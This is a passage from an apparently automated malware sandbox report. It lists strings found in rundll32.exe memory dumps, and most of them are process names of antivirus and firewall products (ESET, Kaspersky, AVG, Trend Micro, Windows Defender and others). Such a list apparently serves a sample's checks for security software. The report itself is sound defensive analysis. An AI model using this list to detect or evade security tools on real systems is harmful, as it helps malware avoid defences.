0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: portmonitor.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089140201.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461916716.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PSIMSVC.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tmproxy.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522323197.0000025BF0176000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fih32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dwuser.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KAVSTART.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: kvsrvxp.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CUREIT.exe
    Source: rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012065404.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NMAIN.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsaua.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nod32krn.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935290329.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF016B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237881300.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPSCHD.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CLPSLS.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012065404.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714628317.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ONLINENT.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FPAVServer.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xcommsvr.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E0000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371707051.0000025BEE244000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089140201.0000025BF012E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PsImSvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: capfasem.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FSGK32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF016C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OP_MON.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563006653.0000025BF00D6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371707051.0000025BEE244000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pavbckpt.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: TMPROXY.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A2START.EXE
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CFP.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF016A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: webproxy.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GDFirewallTray.exe
    Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KAVPFW.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nod32kui.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGUI.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nspupsvc.exe
